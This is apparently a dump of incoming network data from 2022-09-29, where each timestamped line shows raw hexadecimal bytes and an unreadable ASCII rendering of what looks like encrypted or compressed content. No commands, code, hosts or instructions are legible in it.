                                                                                                        2022-09-29 12:45:18 UTC1704INData Raw: f8 b2 6c e7 0d 6c 29 21 a6 ac 12 97 8f f6 48 41 79 3c d0 9c 7d a5 09 db 22 85 50 ff b1 9d de 70 a9 6e 7d 24 54 c4 4a dd 96 12 69 d6 17 d6 3a 2c f6 11 3d df 8b bc 77 0a 5a be e6 1e 1b ce 73 65 27 0f 12 15 80 1a 66 80 81 74 5a dc 87 1d 36 36 01 db 30 26 bc b6 d5 b8 2c ca 2e 04 42 fc ff 7e a8 20 e9 ad d7 9f 03 e9 f7 84 be 63 fe 06 1b 9e 46 17 54 4d d7 ee 88 62 1c b0 60 49 37 50 3f da e4 4a 61 99 dd 28 df b6 43 1d 74 26 62 18 97 bf ac 42 4d 9a 7b 75 67 33 8d 37 ac 82 59 ce d7 b2 94 d6 8e fd 5a 10 5b 65 67 64 bb c7 cf b0 82 11 e4 33 53 61 30 13 61 f6 62 ce 8f ed 67 8b bc e3 37 43 3b 6b b0 f6 d7 2d a1 26 d7 d3 33 d7 a5 d4 e3 de 1a e0 67 c0 8f b2 10 d3 07 c0 6b 89 f6 21 7b f8 e1 03 da c8 87 a5 a8 cc 1a d0 ee 4c da d9 6e fa b2 7b 6f c2 32 d7 8a 40 74 49 c7 25 ce
                                                                                                        Data Ascii: ll)!HAy<}"Ppn}$TJi:,=wZse'ftZ660&,.B~ cFTMb`I7P?Ja(Ct&bBM{ug37YZ[egd3Sa0abg7C;k-&3gk!{Ln{o2@tI%
                                                                                                        2022-09-29 12:45:18 UTC1720INData Raw: ff 0b 77 ed 08 58 7e 32 03 78 16 25 fb 14 9f cf 9d 82 bd cb 1e 03 f2 60 ff 4c ac 98 72 0c e7 1d f7 ed 3e 9a 34 21 ee 06 02 07 f3 0d 8c 0c b0 95 23 87 86 f0 be ac 30 5e c1 48 74 f5 d6 8a 9b 73 bf b5 34 ef ac 93 02 98 7d f7 ca da f9 19 d3 04 69 f1 85 74 5d fe 28 95 eb d5 e8 ef e1 b2 ca 8d 63 c5 7b 49 9d 38 b1 1a f7 fb 32 3f 89 95 50 e4 c6 ef 7c 51 a4 4c ae db ad 54 45 b0 94 70 ee 2d 79 28 13 74 47 97 5b 88 1a 57 79 fd 4e 33 a3 69 b0 96 d9 b5 ba a1 5d ce 55 b1 bb d9 56 d7 c7 14 8a e4 c9 b9 a7 86 a2 d2 13 72 71 34 59 13 67 4b e8 37 83 a0 d5 92 b6 db a0 e0 a4 60 60 34 47 cc ea 06 70 0c d4 70 23 8d 6b f7 75 41 2c 89 6c fe 27 4c ba fe ee a4 40 f6 87 b8 3b f9 52 14 7b de 3d 48 68 fe 84 04 ae 42 4f 13 43 5c ba 6c 77 53 2b 52 b1 10 1c 64 06 b0 c5 c2 bf e5 0d d3 70
                                                                                                        Data Ascii: wX~2x%`Lr>4!#0^Hts4}it](c{I82?P|QLTEp-y(tG[WyN3i]UVrq4YgK7``4Gpp#kuA,l'L@;R{=HhBOC\lwS+Rdp
                                                                                                        2022-09-29 12:45:18 UTC1736INData Raw: cf ce 82 93 eb 13 88 13 69 fc c7 ff 4b e8 33 fd 77 3e 53 36 9e 5a 0c fe 7b 3c 8c 16 da 6a 13 dc bb 10 5c ab 4e 89 90 0e b2 53 e2 7b b1 b7 6e 3b 8e c8 0b 5f 7c ec 6f 21 cc ea 46 fc 3e 1c 38 45 3a 82 02 1e 6d 01 2f ca fa cc de a1 b4 0f af 99 f3 ce 97 fa 86 51 3b 12 a0 a4 7b 12 bf 00 3d d7 00 86 a1 68 94 c0 42 d8 e2 12 9a 56 cd 9f f8 32 c0 81 d4 6d 80 9c 42 77 2b 7d 97 c9 d7 bb 2f 63 8f 59 50 94 b6 f5 43 2f fa 9a ef 40 36 f8 9d c6 de b8 82 dc 98 74 f0 1e 2f 6f a3 aa 91 db b0 a5 4d de c0 4c 7b 17 bf c8 1b 8e 20 d9 0c f5 85 13 c0 57 c4 20 38 7a b0 0d 66 5d 0a 4d 4e db 0c 73 fd 39 af 64 c5 32 36 a0 9b c7 c0 17 61 64 57 f6 42 a3 a4 e7 04 2c 99 6c 27 82 e0 96 85 44 61 f2 81 6f b2 3f bd b3 3a 8d c3 af f0 d4 a9 f8 bb bc 76 6a 02 43 d9 57 84 db 7b d6 f8 9c c0 9b a0
                                                                                                        Data Ascii: iK3w>S6Z{<j\NS{n;_|o!F>8E:m/Q;{=hBV2mBw+}/cYPC/@6t/oML{ W 8zf]MNs9d26adWB,l'Dao?:vjCW{
                                                                                                        2022-09-29 12:45:18 UTC1752INData Raw: c2 55 1b 9e f7 98 9e 1c 5a 3a b3 5a 63 98 99 9e 50 32 f5 e6 e3 98 c7 38 5f 52 0b 29 1f 77 b3 c0 f7 70 72 ed 63 e6 37 c7 fa f4 a8 97 73 b3 e3 1b d0 b4 4c ae 72 05 d1 9c ee db 5f 62 ca fc 0e 2a 69 56 b3 97 b3 ce 3d 96 11 41 16 1e a9 21 90 0c 31 52 9c 96 81 66 52 ee a7 eb 22 b6 f9 32 aa 2a c9 fc a7 95 42 ff fb 80 4e f8 a4 ae cb ac b3 8b f8 a7 d5 62 b4 d9 a1 cc f5 18 5b 49 86 a3 55 8f fd 4b 23 d4 20 bc 9f b5 7a e2 4c 75 2e 99 d3 72 2e 61 6b 34 ca 7b 0e a9 0a 4d e6 25 bc c4 3d 76 3e 21 cf 42 c0 f5 fc 2d b5 6f 0e 2c 78 a4 85 e7 0c 2b 6d f9 97 1f 94 1f 46 08 8c 9e 9f e7 d1 e7 14 c5 28 a0 84 9b 64 f3 39 2c 46 93 ef f9 53 5e d5 60 d4 eb 4a ab fc 51 ba be 20 fc ef a9 94 a0 c7 55 06 53 6b eb fe f1 e8 01 51 5d 3f d9 0a a4 89 ce 22 d8 2e 0b c1 33 be 87 f9 81 45 ff b8
                                                                                                        Data Ascii: UZ:ZcP28_R)wprc7sLr_b*iV=A!1RfR"2*BNb[IUK# zLu.r.ak4{M%=v>!B-o,x+mF(d9,FS^`JQ USkQ]?".3E
                                                                                                        2022-09-29 12:45:18 UTC1768INData Raw: c3 9c ac 5a 6e af 09 a1 47 e2 09 85 51 5e d8 55 c3 d0 90 d1 1c b6 6d 93 c5 a1 9d ca e9 94 d7 c5 3a ad 9f 5a 74 20 16 ca c7 bf aa 31 b6 11 07 54 60 1f 8a a6 de 59 52 c8 3b 15 08 b8 10 53 cc b9 d5 f5 7e 91 78 3f 0c 83 0b 5b 6e da a6 3c 5a 9d 9f c9 f3 01 74 ca 6b 29 53 d5 b4 c6 37 64 e0 de 8b e0 e9 8d 22 c6 14 92 d9 77 22 93 a3 40 52 05 52 d6 9b 40 0e 5c 16 b3 0b 86 70 58 50 96 74 f2 0c d7 42 cb de 5a 12 82 84 3c c1 57 ae d0 5a 63 31 d7 d7 ad 6a 0b 4d 6e e4 01 65 48 fb f0 8a e1 0b 64 c6 df bf f2 60 2b bb 75 a4 c4 cf e5 cd cd b9 64 16 0f 6c cc 25 ce a9 e1 92 1e a0 3f 1b 8b 1f 7e be d7 19 de e3 90 e3 72 86 da 3e 62 b7 4b 78 ee ec c5 84 4c b1 4c 08 d1 8d a8 30 96 0f 69 4d 96 0a ee 4e 47 60 ee cf 83 ef 34 20 94 e4 0e 46 ff 77 f8 78 af 09 dc 4b 30 67 dd 17 4f ee
                                                                                                        Data Ascii: ZnGQ^Um:Zt 1T`YR;S~x?[n<Ztk)S7d"w"@RR@\pXPtBZ<WZc1jMneHd`+udl%?~r>bKxLL0iMNG`4 FwxK0gO
                                                                                                        2022-09-29 12:45:18 UTC1784INData Raw: dd 81 ba a3 57 3d 4f f1 14 66 46 be ab b3 e7 3e d0 ad 26 5a 44 af a7 33 15 23 77 3c 8d cf d5 04 2f d7 68 2d cd 9e 7f 91 10 78 2f b6 00 58 8c e3 19 ea 57 34 bf 27 6d 02 7f df 85 b7 2b 72 84 67 f7 f7 2f bf a4 f1 02 ca b1 74 c4 ff 68 10 0b 53 a6 0a a1 cc e3 28 3d aa 9c a8 70 c5 b7 94 2c b6 d2 c3 57 9a 0b cf e0 18 7d 13 3e ae cd 8f c0 48 12 85 49 e4 27 78 c6 05 7f 53 a8 e6 26 7f a4 48 7a fc c9 10 64 83 fb 12 81 ac 68 69 fc 18 40 92 0d 8d f9 20 92 7b 73 1b 87 1a 47 11 ca fc 11 e8 df e9 af 57 58 df ea 01 60 1f 55 31 45 17 4c 68 62 b4 e8 cc 7d ef 33 24 53 6c 34 c8 de d4 a4 3c 94 9e bc 30 86 0b 9b a6 76 d0 a2 bf 0e ee d2 fe 9d e3 b6 19 f3 27 5f 99 da fd e2 c5 64 c7 04 d1 8b 75 bf 62 25 e0 c8 e8 31 87 b5 0f b2 be b6 33 c6 3f 84 67 78 82 da 98 33 9c 65 4f e0 4a f8
                                                                                                        Data Ascii: W=OfF>&ZD3#w</h-x/XW4'm+rg/thS(=p,W}>HI'xS&Hzdhi@ {sGWX`U1ELhb}3$Sl4<0v'_dub%13?gx3eOJ
                                                                                                        2022-09-29 12:45:18 UTC1800INData Raw: 89 a8 b2 d3 41 01 42 2e 5b 06 55 3b be d9 45 b2 31 97 7f 91 c4 6e 5f 11 55 19 36 5e 80 ad 1a 9e d9 e2 23 1a e0 28 52 cf d3 9f 51 58 25 d1 22 c6 28 09 8c e3 ed 83 88 75 90 9d 01 ba a5 d3 b2 c3 da c2 d5 1d c3 c5 a9 2c 35 ce a4 d4 38 f1 4a 1d cf 8f a2 6c cf 0b f0 da e3 46 90 cc 3f eb 85 b3 65 f3 1b 8f 4f 59 68 95 3f 0a 75 24 d7 a1 61 03 2b 6b 1e 63 ee e8 d0 4e b7 7b fe 22 b6 50 cc 6b 0d 37 56 58 b0 b5 f6 82 ce 26 08 d9 b2 f0 e9 30 6f b9 4d a3 2e 2a eb 7d d0 ed bc 83 cb 22 dc a7 7d 1e 97 3d 83 d2 29 45 3e a8 11 05 f4 b9 f8 33 aa 4f 64 63 49 fc bf 69 5d e1 52 ea 4a df b3 e8 f2 9b b4 ac 09 33 ee 59 59 c5 c1 6b 70 5d 46 c5 66 d0 9f 16 53 d1 b2 36 29 a4 e7 2f 15 3f 67 7e 49 fd 6c 65 f8 91 07 b8 54 4a 4c 64 d3 b2 b8 6a 41 0a 5a 4d dd 3e ea 3b cf fa 94 c5 60 0b 06
                                                                                                        Data Ascii: AB.[U;E1n_U6^#(RQX%"(u,58JlF?eOYh?u$a+kcN{"Pk7VX&0oM.*}"}=)E>3OdcIi]RJ3YYkp]FfS6)/?g~IleTJLdjAZM>;`
                                                                                                        2022-09-29 12:45:18 UTC1816INData Raw: 40 81 65 23 fd 9f ff 5f 32 b6 dc be 95 5b f3 27 8e e0 fe 0c 73 ad 24 09 c4 2e 56 81 b9 ce 74 b8 43 1f 32 81 49 6a d7 62 a7 c0 b5 61 1e 1d 58 ed 89 52 a2 98 81 64 78 9e b1 04 49 8d 9a 7c 69 6b 5a a3 36 a6 c4 a2 97 c4 e3 3c ba 55 be 0c 62 c5 3a c8 51 17 7f c4 35 78 b8 4b 14 4b 88 7c 7e fe 7a 8c dc 08 51 c2 5a 69 47 cf a7 40 6a 5d 03 ac d3 88 81 d9 66 5f 24 bd 12 b5 6f 7c 2e 3f 59 b7 2e 08 24 72 8a 6d b7 92 0e 3f c2 9a 39 f2 66 27 14 f1 84 22 6f 43 2f 3e 7f 17 1d 16 54 9f ca 7f 8b 23 da 4b 5c b9 3c 75 ec e0 d4 57 34 16 77 ee 4d 56 1e 4e ac 31 27 90 5f 95 b2 87 25 bf e6 02 3b 65 3c 8a e1 e6 b6 d8 94 8f 7a cd 45 33 47 03 e6 03 ea 51 60 d4 cc 74 2f 14 ef b0 56 73 3a e4 04 a9 85 4c 59 05 b2 96 1a 6a d2 76 26 d0 2b 59 84 ae ae 70 f0 b9 60 24 e8 11 ed 57 54 c8 3f
                                                                                                        Data Ascii: @e#_2['s$.VtC2IjbaXRdxI|ikZ6<Ub:Q5xKK|~zQZiG@j]f_$o|.?Y.$rm?9f'"oC/>T#K\<uW4wMVN1'_%;e<zE3GQ`t/Vs:LYjv&+Yp`$WT?
                                                                                                        2022-09-29 12:45:18 UTC1832INData Raw: 11 6b e5 a3 ff 8d e2 d6 5c 52 74 a9 0f e9 86 e4 2a ab 69 94 ff a0 89 7b f1 11 51 81 b5 19 d7 28 60 3a d0 2d 75 10 e1 ff 6e a7 81 14 18 dc e5 ca 58 60 27 12 11 d9 e9 90 82 11 ce f9 92 ff c9 3c 40 75 4e 1b fd 68 21 b2 e3 0d a3 d6 9a 68 ef 03 ed ee 20 ee e2 14 c0 8c d4 8a 73 f3 2a 72 71 d0 22 6b 5f 1c 94 39 bc b1 85 b2 fe 06 7c 60 f7 5e 89 4c 0c 7b 25 a6 0c 65 b5 4b f1 0e 7f 5d 15 d5 bd f9 63 e9 80 10 1e b3 7e 61 d1 c1 b9 cd 29 44 b0 1e ce fd a5 a0 77 46 ca e4 ad 16 18 31 c2 1e db d3 1a ea 23 43 50 57 37 4d 69 c4 9f a8 87 8f fa 54 49 ed 19 8b a3 9f 13 b3 bd a7 0d 06 c8 59 6c b4 79 ad 68 f3 45 56 cc ce 52 f0 f5 3e ba 99 a6 e3 46 6f 42 f3 66 17 b1 fe 20 86 a1 4e 1e 0a 84 30 88 47 5d 15 b3 d1 23 59 eb af fa c2 06 cb c6 72 df 7f 04 f2 b4 29 f7 c1 16 9d 07 34 f8
                                                                                                        Data Ascii: k\Rt*i{Q(`:-unX`'<@uNh!h s*rq"k_9|`^L{%eK]c~a)DwF1#CPW7MiTIYlyhEVR>FoBf N0G]#Yr)4
                                                                                                        2022-09-29 12:45:18 UTC1848INData Raw: 04 78 5a d0 0a 61 88 35 b9 34 b9 83 49 e2 11 e6 65 33 93 b2 cd c2 c5 8a 96 49 fe 06 13 2a 2f 54 30 e6 78 65 f4 78 58 11 1b 97 31 3f 46 6c 04 40 c1 ef 4b 36 ae 72 f4 bb 67 81 f2 20 e1 16 59 9c 21 5a 75 40 7a e3 5b d0 8d dc 85 55 13 f7 c6 7b de ac 31 13 a5 6a 61 23 d9 a2 ca 39 4d 71 a1 8d 40 18 b3 9a c0 a6 c6 f4 a6 18 3e f3 9f 32 82 d4 79 a7 80 67 8a b4 73 83 f2 22 e5 bf 03 07 1e 1e 72 e8 20 f8 86 9f 1e dd b3 78 f9 95 fd 7d 55 46 1a 3d 49 b4 da 3d e4 03 c9 41 87 78 42 cd a3 93 ab 2c 1d 50 9a 1e 4f 2d 74 82 74 53 91 e2 c0 b5 f9 16 06 02 93 92 ae 2c c1 b0 16 84 74 76 b3 50 fd e3 26 0b 8b 09 b5 a4 73 ea 9c a0 7e 52 15 a4 62 d9 47 ef a4 b2 e0 66 38 5d 01 14 64 cc 29 4c a0 d3 94 36 71 51 00 e4 75 1a 7c f3 24 65 e7 a1 36 06 6f 99 d2 20 fe 2a bb ce c5 a9 0c 70 c4
                                                                                                        Data Ascii: xZa54Ie3I*/T0xexX1?Fl@K6rg Y!Zu@z[U{1ja#9Mq@>2ygs"r x}UF=I=AxB,PO-ttS,tvP&s~RbGf8]d)L6qQu|$e6o *p
                                                                                                        2022-09-29 12:45:18 UTC1864INData Raw: 9b c9 6c 65 2f 5d c1 b6 80 f3 44 1c e6 e3 ca b0 cb 9c e8 5c ca dc 09 c2 c2 ec 41 28 1c 68 8a 1d 14 19 8f ab 44 e1 9d c7 86 35 7d 51 70 f8 15 65 9d fd f3 20 d0 1b 5b fd 19 5e 3b 3d b5 6f a1 9f 13 63 52 6f aa f6 94 28 6e 2a d3 2f fd b9 09 42 9d 69 17 51 f6 81 77 0d 6f 1b df 04 d2 0e 5d c3 93 89 c0 73 9c a7 83 73 6b 98 07 ae 15 00 5c 1b 0e 33 75 01 cc 24 98 97 b6 b7 fe 9d 4d fc da e8 58 5b 5b 26 9d e0 01 12 bc e8 d7 3f 7e ce a5 74 30 60 d3 82 16 c4 bc d1 22 77 9d c2 92 97 17 c8 48 3c 5a 4b 8f 72 09 d9 5a b7 7d 82 e0 09 d8 27 77 a4 27 82 e3 d1 7c 2f 7c f4 5f 00 cd ff 4c 9f a7 08 5d 3b a5 bf fd 16 82 9b 8b 72 65 a3 67 fd 9d ff 35 68 5f c6 a4 46 0d a5 93 b5 c4 fb f3 f6 7e bf 2c 1c 11 3e 19 af d0 46 5a b8 09 05 52 24 23 e9 fd 7b b2 9d d6 f1 b9 56 d5 71 c6 d9 0c
                                                                                                        Data Ascii: le/]D\A(hD5}Qpe [^;=ocRo(n*/BiQwo]ssk\3u$MX[[&?~t0`"wH<ZKrZ}'w'|/|_L];reg5h_F~,>FZR$#{Vq
                                                                                                        2022-09-29 12:45:18 UTC1880INData Raw: 63 f9 0c 7c 7d 0c 68 c7 a8 3c 79 c1 c7 2e 95 52 a7 96 2a 6b b5 20 5a 4b 19 7d d5 3d 99 d6 74 b9 14 38 32 1d 00 fa ad a5 4b ee b4 76 6a 71 89 58 f7 7f ed c0 e0 9a 3f 6b b1 df e6 9d 4f dc 13 70 58 71 8a 6c 67 6e 80 ed d7 f7 79 39 3b c8 3b 52 0e 29 0e c2 1d 7c 85 0a 5f 53 87 fd d2 b3 8e a9 2c 4b 68 d9 b3 a8 88 fa 2b 96 15 55 9b f5 98 26 b5 80 30 46 14 83 76 9b 82 82 0d 27 69 2f 62 70 c8 3d 3e 0b 81 d7 a6 bc 01 c2 e3 d8 fc 1f a6 a8 5c 8e 0b 96 af ec 62 ff ca 95 f8 68 e1 55 d5 04 11 2a 66 49 95 a9 ec 01 0f 21 34 72 00 82 b8 d9 47 7b 0b 95 10 34 04 fa eb 3b d4 91 96 36 aa ff 5a cc 0a c6 de 86 d9 4b 88 31 91 1e 1d ef b0 d8 4e e0 34 bf fa 41 28 2f 19 f6 dc f9 86 7d 00 c3 a0 fa 35 0d bd 4a 46 0c a5 e6 16 c1 ad e8 e9 aa a7 87 14 c3 fb b1 98 e5 e0 f7 18 8e d7 39 99
                                                                                                        Data Ascii: c|}h<y.R*k ZK}=t82KvjqX?kOpXqlgny9;;R)|_S,Kh+U&0Fv'i/bp=>\bhU*fI!4rG{4;6ZK1N4A(/}5JF9
                                                                                                        2022-09-29 12:45:18 UTC1896INData Raw: f3 dd 84 7c c1 9e c5 22 48 91 77 2d 09 34 b0 b3 97 f5 cc 3a 05 b2 79 cc 01 6e 1d e1 52 bc ce ff 7e 18 8f 74 9d 8a e9 dd 74 3f eb 6f ba c2 aa 5e d0 9a fd 68 4e d4 0c c2 5a ed 91 73 0a 2a ea e9 00 dc a8 06 29 ad 30 92 5c 31 87 8d e5 f8 d2 57 98 3f c5 37 8a 1b 6d cb 96 3a ef 51 6f 64 33 ff 29 ac f5 10 87 42 b0 ff 79 0e 87 f5 5d 4b 86 84 2e cb 75 88 84 5f 0d 16 65 f3 bc 8a 93 a8 1b 4e b0 f7 33 03 b9 cf 92 1f f8 ce 19 25 38 4d 5f 82 8b a4 2e 9e 4a 9b 6b e2 8e 9b 5d 11 44 d8 9f bd bd 9b df 17 b5 53 43 c8 f1 a4 56 db 9f 17 6a 7c 77 f5 75 10 ea fd 7a a4 59 c7 12 49 ed b1 7d 6f 75 b9 06 29 71 b5 84 59 89 23 fc a4 ad 2c 60 c5 c6 74 c5 f5 b4 92 a7 d4 18 a6 1b 06 67 45 18 e1 2e 24 a4 6b af 0a f1 67 ac 35 bb f8 e0 81 92 a2 03 a4 cb 2b 38 da 6e cb 31 24 79 ac 13 e4 35
                                                                                                        Data Ascii: |"Hw-4:ynR~tt?o^hNZs*)0\1W?7m:Qod3)By]K.u_eN3%8M_.Jk]DSCVj|wuzYI}ou)qY#,`tgE.$kg5+8n1$y5
                                                                                                        2022-09-29 12:45:18 UTC1912INData Raw: 7a 9d 8d f1 f6 ad 27 38 20 ee b9 0c f2 b5 b0 c5 c3 4d fa 44 06 4d 20 f6 65 05 a0 e4 d0 7c db fa f0 58 13 70 11 7f f3 bc 9d 58 a0 83 65 97 9c 2b 95 2b b9 48 ba 62 03 82 81 ba 4e d7 e5 24 4b 4b a8 87 e6 d5 2b 91 c7 8b fa 1f 1e f1 18 7b 9a 31 03 69 ca 99 60 83 5e 16 eb 54 bc 2b 63 f9 05 4d 61 99 51 b8 a6 81 7f 39 d5 4a 2a 31 86 dd f0 64 22 01 19 a9 a8 25 f4 0c f4 84 39 86 d8 ef dc 20 51 7c e5 db 98 41 9f 89 22 7e 2c 7b 51 4f 2c e0 34 dd d9 14 86 14 b8 84 11 de 53 dc b4 c1 42 7c f2 1e 62 f5 18 e9 42 7a d9 c2 3b 45 29 2a 05 8f bf f8 f0 ad 57 6d bb fa 50 f4 54 c3 63 d7 0b 06 6f 90 86 f3 43 ca 8b 32 7f d4 56 93 76 6e 80 c4 b4 d5 fa 46 15 54 92 4e 06 ce c5 b0 2a 20 f6 cc f9 66 24 a6 bd 3d 7c 49 4b 98 d1 b0 0a 60 fd 9a fd 17 c4 22 0b 70 cf 38 bf a4 65 f6 5f 76 08
                                                                                                        Data Ascii: z'8 MDM e|XpXe++HbN$KK+{1i`^T+cMaQ9J*1d"%9 Q|A"~,{QO,4SB|bBz;E)*WmPTcoC2VvnFTN* f$=|IK`"p8e_v
                                                                                                        2022-09-29 12:45:18 UTC1928INData Raw: cc 1a 69 71 2f 62 7f 2a 02 f4 fc 9b 77 06 be 1b 32 a9 49 eb 98 2f aa 89 35 dd 2c 5d 0f e0 fa 16 16 cc a1 8e ef 4f 85 e5 53 ee 9b 9e f9 1d 8c 98 43 a0 71 b5 f3 f1 70 ac ae 80 6d 14 a9 58 e0 90 ec 53 4d 07 8f 75 d3 58 9a 70 a2 80 f7 6e a6 17 fd 18 b5 7c 14 6d 36 64 dc 44 36 cf c6 db 63 63 1f c4 76 5a 2f 35 f0 25 75 fd 21 c5 fa e8 4f 16 84 78 99 e9 91 a9 70 38 27 ac 0b f2 c6 1e e8 c3 80 d3 ca 8d 35 23 3a e5 95 c1 c4 f9 ff b0 57 1e 8e eb ca f1 b2 be c7 70 a2 c2 5f 2f 8f 54 6e 34 77 ed 33 9e 0f 8b 3b 52 20 e1 41 bb 65 38 d3 ec c5 5a 33 d2 e4 3a 2f 04 b8 f6 ba 58 76 f8 e8 63 f7 64 cc b4 57 d5 98 9b 66 8a f1 ad 68 65 eb b5 0c a7 5d 1a 2b 61 23 6d e3 a9 88 7d 91 37 aa bf 14 17 0e f5 37 7f 86 4c ff 9d b4 b0 76 4b b2 48 5a 69 39 61 0c 9d cc 12 6e b2 9c bb 69 4e 1b
                                                                                                        Data Ascii: iq/b*w2I/5,]OSCqpmXSMuXpn|m6dD6ccvZ/5%u!Oxp8'5#:Wp_/Tn4w3;R Ae8Z3:/XvcdWfhe]+a#m}77LvKHZi9aniN
                                                                                                        2022-09-29 12:45:18 UTC1944INData Raw: bc 2c c5 e8 23 6f 0b 6c 4b ae 1e f8 2f 6d 38 bc d3 d9 f5 f1 52 48 02 cd a5 dd 84 2e 49 5d da c7 99 85 32 eb cd bb 84 2d da cf 4e 6e 8f f9 ca 8f c8 d9 a4 5b bd 25 79 af 19 04 f9 21 5b d6 82 02 a1 4e d2 da a7 b6 fa 31 69 03 3e 5b ed 89 f6 ff 09 7e f1 e4 a5 78 33 ac 40 eb 41 49 54 37 a9 37 12 9a 6f e4 6c 0a 56 ab 17 e7 57 e6 18 38 84 ae b3 2d ba 59 22 b3 a7 d2 5f f7 94 5d 70 78 23 7a 3f cb 43 03 58 bb 06 86 c0 35 ed c1 b8 96 eb e8 ad ef 11 90 a5 24 37 f3 60 b3 26 94 09 6e ae da af 39 3e ba be 78 85 4d 93 4c 7a 04 5e 27 47 3e 73 0f 99 f1 a1 1f 4e 40 8c 79 19 57 8f 1a e6 ba 85 7c ed 10 08 45 f4 06 24 b2 ee d3 b1 10 25 79 94 9a e4 22 5a df 17 eb 49 85 fc c3 4c a3 06 f7 b1 eb df 72 d5 17 06 6c 8b 37 3c 68 66 15 a1 05 48 23 c9 11 a9 94 4c 94 98 95 a9 aa a6 3c d5
                                                                                                        Data Ascii: ,#olK/m8RH.I]2-Nn[%y![N1i>[~x3@AIT77olVW8-Y"_]px#z?CX5$7`&n9>xMLz^'G>sN@yW|E$%y"ZILrl7<hfH#L<
                                                                                                        2022-09-29 12:45:18 UTC1960INData Raw: c5 1b 91 52 80 fd d1 d4 3d 83 33 b2 6d 3c ad 85 dd 0c 8a 75 52 cc 60 a4 9a 9e eb 9d b2 ee a0 ef 87 30 9e 2c 95 6e 5d 29 17 7b 5d 27 44 0a e6 6d 80 46 02 0a 2d 90 ae 49 dc 68 a8 a8 5a 0d 4e eb 78 f4 ff 29 3a ff 30 88 de b9 49 b2 47 b0 fd 55 b3 a6 14 78 36 f8 58 72 29 e5 8f 70 f7 c2 77 21 0f 7d 37 2b 56 3c b8 77 da 20 52 ea 23 67 23 71 96 d6 1d c6 7b 8a 16 a3 64 68 42 4a 84 ea bc d6 db bf e8 33 32 0d fa 51 b8 59 1d 5b 13 be f0 aa 86 ca dd 83 43 ad 1d 40 b6 54 bf 61 c5 83 2c 60 76 98 9a 2d ec b1 35 90 5c e9 a5 4a f0 cd 36 d2 6d 31 d0 b6 78 27 97 4a 53 26 2f bd 49 d7 65 01 c5 8b 43 cc ea ce 5a ab f3 05 53 0a 07 f1 83 d3 cb ab 8f 07 bc db f3 c9 cd 1c e8 73 ff 69 3e 65 bd bf 96 a5 2c 33 6c 34 cf 46 d9 19 c1 b0 ca 07 98 cb ce 04 09 13 fd a0 31 a0 87 1f a9 9a 6d
                                                                                                        Data Ascii: R=3m<uR`0,n]){]'DmF-IhZNx):0IGUx6Xr)pw!}7+V<w R#g#q{dhBJ32QY[C@Ta,`v-5\J6m1x'JS&/IeCZSsi>e,3l4F1m
                                                                                                        2022-09-29 12:45:18 UTC1976INData Raw: 28 c7 ac 09 dc 54 2b a4 f6 11 94 cf 9a 68 ce a7 3f dc 1e 02 c7 39 40 aa c5 17 86 e0 1a 59 a6 cb 46 ef cc 75 fe de 03 20 fb e8 8e 0f db fe ca a7 56 35 e3 b0 54 53 e4 73 3b a3 84 1e 67 40 c4 c3 02 0f 2c 98 fb ed 58 f7 ad 0e a5 99 9d 5c 07 10 b7 4d 48 56 8a fc b6 4d 55 d4 57 60 b8 c7 19 cb f5 32 09 dc b3 80 12 94 09 1d 7d b0 a4 25 12 fc af ce 04 b0 59 a6 39 00 c3 5e 61 c8 5b b2 6f 38 5b 0f 24 ac 8a 4c 27 bb 53 a2 44 af 47 a6 0a 00 6a 91 ae 15 5f 8b d4 0b 2f 1e 03 1c 90 cd d1 fd 6a 1e 31 0c 85 52 eb 69 2e 8a e8 7c 6f 3a 46 d1 72 9f 95 1b 77 3e cc 08 25 98 36 08 d8 7d bb c1 ba 82 e2 af df 6a eb 00 7e 61 67 ad 63 1d 06 b3 c9 f6 22 85 60 09 34 ea a8 b8 84 b8 45 83 d6 4d 43 70 5c 1d 3d ce 1c e3 28 8a 56 9b 7b 11 b3 61 30 ed 69 ff cd 82 9a 15 4f fd b8 15 da ee 64
                                                                                                        Data Ascii: (T+h?9@YFu V5TSs;g@,X\MHVMUW`2}%Y9^a[o8[$L'SDGj_/j1Ri.|o:Frw>%6}j~agc"`4EMCp\=(V{a0iOd
                                                                                                        2022-09-29 12:45:18 UTC1992INData Raw: f8 79 72 72 24 c6 08 94 4f 26 c9 a8 56 8d f6 c2 c9 97 27 73 91 4e 99 d5 6a 38 2a 68 eb a4 67 a6 cc f3 e4 d8 47 72 65 12 20 c3 b9 05 25 8d 70 42 75 44 f7 a4 8b 99 b6 f3 4c 5c 63 0a 5d f3 50 1d 3a 6d 6b 54 c5 c4 8f 14 dc 99 5e 24 6e dd 62 33 ec d6 e5 37 7c 97 90 c6 6d 88 e3 35 82 e2 6b d5 bf f7 96 26 48 14 f2 af ab fb 2b 4d d6 b7 93 8d 02 9c 8b 28 38 a5 24 9d aa f0 d9 93 8d 64 96 79 68 9b b8 6a 35 08 b0 51 e2 a0 cb 2f 97 28 99 d1 17 ba 2e d6 13 05 ae f9 89 03 ad c0 98 9f f2 f2 0e 99 6b a4 f1 d5 bc 02 ef 25 10 ed 36 b4 df 9d 79 23 16 ad 0b 6b 33 f2 c5 b8 9e d2 32 d3 1f ce f2 20 3b 6c 93 7d 92 01 98 7f 77 89 c2 15 bf 34 b3 23 fe eb b4 85 9e 58 85 63 ca 0d 05 41 09 25 79 11 0b bb 58 9a 98 76 21 81 07 4d d0 51 dc eb 2b e6 b9 a3 da fb 81 03 da d0 97 73 bb 92 1d
                                                                                                        Data Ascii: yrr$O&V'sNj8*hgGre %pBuDL\c]P:mkT^$nb37|m5k&H+M(8$dyhj5Q/(.k%6y#k32 ;l}w4#XcA%yXv!MQ+s
                                                                                                        2022-09-29 12:45:18 UTC2003INData Raw: 4f 83 c3 98 fb e4 7b 83 df fa 7b 17 40 c4 a3 37 dc ad 02 25 be 9e 49 50 0b 50 c5 c1 f5 62 b1 12 92 a8 c6 21 0c 17 96 e1 5d 1f 35 d0 05 c7 2b f2 af 45 b1 5d a5 a4 e2 b7 10 40 49 2d ea 53 8d e2 8e d8 2c f3 f0 ae be be 9f 24 66 96 63 00 cc 33 3a e3 6f 51 47 f3 bf 1d 24 a4 5b 1b 69 11 75 b8 a8 8f cd 06 75 2c 35 44 38 65 4c 7b 5c b0 27 58 8a aa 10 4c 8d 74 b3 ce ea 07 00 d9 3b 9b 4a 27 cd 91 a7 5a 01 1b 62 98 ec 33 7a b8 09 b9 f9 6c 0f 7c 43 c9 d5 1d 77 d8 92 61 dd a6 fb 70 1f 72 61 06 f5 08 f4 3b 42 3c 74 82 28 db b6 27 6f c7 08 52 63 3e bc 66 01 02 7c aa 10 52 49 bc 52 b5 fa af c0 cc e8 3a d3 a3 